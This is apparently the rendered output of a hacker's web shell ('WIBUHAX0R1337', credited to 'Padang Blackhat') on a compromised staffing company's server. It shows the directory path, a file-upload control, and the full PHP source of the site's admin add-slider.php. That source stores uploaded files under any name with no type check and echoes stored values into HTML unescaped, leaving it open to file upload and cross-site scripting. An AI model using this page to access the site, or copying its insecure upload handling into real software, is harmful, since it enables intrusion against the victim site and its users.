-
✘✘✘ WIBUHAX0R1337 ✘✘✘
-
✘
PATCH :
/
home
/
indianstaffing
/
www
/
admin
/
Upload File:
files >> /home/indianstaffing/www/admin/add-slider.php
<?php include'include/header.php'; include'include/sidebar.php'; $date = date("Y-m-d"); error_reporting(0); $msg = $sldrheading=$sldrsheading=$sldrsheading=$sldrimg=$sldralt= ''; if (isset($_GET['id']) && $_GET['id']!="") { $required=""; $id = mysqli_real_escape_string($con, $_GET['id']); $res = mysqli_query($con, "select * from slider where id ='$id'"); $check = mysqli_num_rows($res); if ($check>0) { $arr = mysqli_fetch_assoc($res); $sldrheading = $arr['heading']; $sldrsheading = $arr['subheading']; $sldrimg = $arr['image']; $sldralt = $arr['alttag']; $url = $arr['url']; }else { header("location: slider.php"); } } if (isset($_POST['sldrbtn'])) { $id = mysqli_real_escape_string($con, $_GET['id']); $sldrheading = mysqli_real_escape_string($con, $_POST['sldrheading']); $sldrsheading = mysqli_real_escape_string($con, $_POST['sldrsheading']); $sldralt = mysqli_real_escape_string($con, $_POST['sldralt']); $url = mysqli_real_escape_string($con, $_POST['url']); $filename = $_FILES["sldrfile"]["name"]; $tempname = $_FILES["sldrfile"]["tmp_name"]; $folder = "uploads/banner/" . $filename; $res = mysqli_query($con, "select * from slider where heading = '$sldrheading' and id = '$id'"); $check = mysqli_num_rows($res); if ($check>0) { if (isset($_GET['id'])&& $_GET['id']!="") { $getdata=mysqli_fetch_assoc($res); if ($id==$getdata['id']) { }else{ // $msg= "this interview is already exist"; $msg = '<div class="alert alert-danger alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> This slider is already exist. </div>'; } }else { $msg= '<div class="alert alert-danger alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> This slider is already exist. </div>'; } } if ($msg=="") { if (isset($_GET['id']) && $_GET['id']!='') { if ($_FILES["sldrfile"]["tmp_name"]!="") { $image = $filename; }else{ $image = $sldrimg; } move_uploaded_file($tempname, $folder); $update = "UPDATE `slider` SET `heading`='$sldrheading',`subheading`='$sldrsheading',`image`='$image',`alttag`='$sldralt',`url`='$url' WHERE id='$id'"; $update_query = mysqli_query($con, $update); if ($update_query) { echo "<script>alert('Slider update successfully'); window.location.href='slider.php';</script>"; } else { echo "<script>alert('Slider not updated successfully');window.location.href='slider.php';</script>"; } }else { move_uploaded_file($tempname, $folder); $insertquery = "INSERT INTO `slider`(`heading`,`url`, `subheading`, `image`, `alttag`) VALUES ('$sldrheading','$url','$sldrsheading','$filename','$sldralt')"; $insert_query= mysqli_query($con,$insertquery); if ($insert_query) { echo "<script>alert('slider added successfully'); window.location.href='slider.php';</script>"; } else { echo "<script>alert('slider not added successfully');window.location.href='slider.php';</script>"; } } header('location: slider.php'); die(); } } ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <div class="content-header"> <div class="container-fluid"> <div class="row mb-2"> <div class="col-sm-6"> <h1 class="m-0">Slider</h1> </div><!-- /.col --> <div class="col-sm-6"> <ol class="breadcrumb float-sm-right"> <li class="breadcrumb-item"><a href="<?= $weburl; ?>/index">Home</a></li> <li class="breadcrumb-item active">Slider</li> </ol> </div><!-- /.col --> </div><!-- /.row --> </div><!-- /.container-fluid --> </div> <!-- /.content-header --> <div class="row"> <div class="col-6 mx-auto"> <form action="" method="POST" enctype='multipart/form-data'> <div class="card-body"> <?php echo $msg; ?> <div class="form-group"> <label for="sldrhdname">Heading</label> <input type="text" name="sldrheading" class="form-control" id="sldrhdname" placeholder="Heading" value="<?php echo $sldrheading ?>"> <small><strong>Note: </strong>Max 35 character is allowed</small> </div> <div class="form-group"> <label for="sldrhdname">Sub heading</label> <input type="text" name="sldrsheading" class="form-control" id="sldrshdname" placeholder="Sub Heading" value="<?php echo $sldrsheading ?>"> <small><strong>Note: </strong>Max 90 character is allowed</small> </div> <div class="form-group"> <label for="exampleInputFile">Upload banner</label><br> <input type="file" name="sldrfile" id="exampleInputFile"><br> <small><strong>Note: </strong>Image Dimension (1920px X 650px)</small> </div> <div class="form-group"> <label for="sldralttag">Alt Tag</label> <input type="text" name="sldralt" class="form-control" id="sldralttag" placeholder="Alt Tag"value="<?php echo $sldralt ?>"> </div> <div class="form-group"> <label for="sldralttag">URL</label> <input type="text" name="url" class="form-control" id="sldralttag" placeholder="URL"value="<?php echo $url ?>"> </div> <div> <input type="submit" name="sldrbtn" class="btn btn-primary" value="Submit"> </div> </div> <!-- /.card-body --> </form> </div> </div> </div> <?php include'include/footer.php';?>
2022 - 2023 Copyright By Lutfifakee || Padang Blackhat ♥